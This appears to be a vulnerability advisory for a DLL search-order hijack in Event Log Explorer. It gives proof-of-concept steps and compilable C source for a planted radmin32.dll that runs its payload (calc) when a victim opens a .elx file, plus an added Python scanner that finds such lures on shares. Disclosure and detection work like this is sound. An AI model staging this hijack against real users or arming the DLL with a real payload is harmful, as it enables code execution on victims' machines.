Event Log Explorer 4.6.1.2115 – Remote Code Execution

A remote code execution vulnerability has been discovered in the official Event Log Explorer software. Event Log Explorer loads a library named "radmin32.dll" by name, and Windows resolves it from the directory of the document being opened (classic DLL search-order hijacking). An attacker creates a file with the .elx extension (the extension registered to Event Log Explorer) and places it in a shared folder together with a malicious DLL named "radmin32.dll". When the victim double-clicks the .elx file, it opens by default with Event Log Explorer, the attacker's DLL is loaded in place of the expected one, and the arbitrary code it contains runs on the victim's system.

Product & Service Introduction:
===============================

Event Log Explorer is an effective software solution for viewing, analyzing and monitoring events recorded in Microsoft Windows event logs.

(Copy of the Vendor Homepage: https://eventlogxp.com/)

Date of Discovery:
==================

2018-09-15

Exploitation Technique:
=======================

Remote

Platform Tested:
===============

Windows 7 & 10

Risk Level:
===========

Proof of Concept (PoC):
=======================

For security demonstration or to reproduce the issue, follow the steps below.

1. Download and install Event Log Explorer.
2. Create a new file with the extension .elx (the content does not matter; the extension is what causes Event Log Explorer to open it).
3. Compile the DLL below and name it "radmin32.dll".
4. Put the .elx file and the malicious DLL together in the same folder (for example a network share the victim can reach).
5. Open the .elx file (double-click it, so it is handled by Event Log Explorer).
6. The calculator starts, proving that the planted DLL was loaded and executed.
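The layout the steps above describe (a lure document next to a DLL the viewer will load) is also what a defender can hunt for on file shares. The following script is an added example, not part of the original advisory: it walks a directory tree and reports every folder that contains both a .elx file and a DLL, rating a DLL named radmin32.dll as high and any other co-located DLL as medium. The share layout, file names and stub contents it builds are constructed fixtures; real .elx and DLL contents are not needed for the check.

```python
"""
Hunt for staged DLL-hijacking lures: a .elx document sitting next to a DLL
in the same directory.  Added example; the sample share it scans is
constructed in a temporary directory and is not a real share.
"""
import os
import tempfile
from pathlib import Path

LURE_EXT = ".elx"                       # extension handled by Event Log Explorer
KNOWN_HIJACK_NAMES = {"radmin32.dll"}   # DLL name named in the advisory


def find_lures(root, lure_ext=LURE_EXT, hijack_names=KNOWN_HIJACK_NAMES):
    """Return sorted (document, dll, severity) triples, paths relative to root,
    for every directory under root holding both a lure document and a DLL."""
    root = Path(root)
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        docs = [f for f in files if f.lower().endswith(lure_ext)]
        dlls = [f for f in files if f.lower().endswith(".dll")]
        if not docs or not dlls:
            continue                    # a DLL alone, or a document alone, is not a lure
        for doc in docs:
            for dll in dlls:
                severity = "high" if dll.lower() in hijack_names else "medium"
                doc_rel = (Path(dirpath) / doc).relative_to(root).as_posix()
                dll_rel = (Path(dirpath) / dll).relative_to(root).as_posix()
                findings.append((doc_rel, dll_rel, severity))
    return sorted(findings)


def build_sample_share(base):
    """Constructed fixture: one staged lure using the advisory's DLL name,
    one lure with an unrelated DLL name, and one benign folder."""
    base = Path(base)
    lure = base / "reports"
    lure.mkdir()
    (lure / "q3-audit.elx").write_text("")       # stub document (constructed)
    (lure / "radmin32.dll").write_bytes(b"MZ")   # stub DLL header (constructed)
    other = base / "shared"
    other.mkdir()
    (other / "notes.elx").write_text("")         # stub document (constructed)
    (other / "helper.dll").write_bytes(b"MZ")    # unrelated DLL name, still suspicious
    benign = base / "tools"
    benign.mkdir()
    (benign / "tool.dll").write_bytes(b"MZ")     # DLL with no document beside it
    return base


def scan_sample_share():
    """Build the constructed share in a temp dir, scan it, return the findings."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_share(tmp)
        return find_lures(tmp)


if __name__ == "__main__":
    for doc, dll, sev in scan_sample_share():
        print(f"[{sev}] {doc} sits beside {dll}")
```

Run it against a real share root by calling find_lures(r"\\server\share") instead of the constructed fixture; a hit on radmin32.dll next to a .elx file is exactly the staging the PoC steps describe.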

--- DLL Exploit ---
/* Build as a DLL, for example with MinGW: gcc -shared -o radmin32.dll exploit.c */
#include <windows.h>
#include <stdlib.h>

#define DLLIMPORT __declspec (dllexport)

int evil(void);

/* Exported function kept from the original PoC; the payload runs when the
   hijacked DLL's export is called */
DLLIMPORT void HrCreateConverter() { evil(); }

/* Payload: launch the calculator as proof of execution, then exit */
int evil(void)
{
    WinExec("calc", 0);
    exit(0);
    return 0;
}
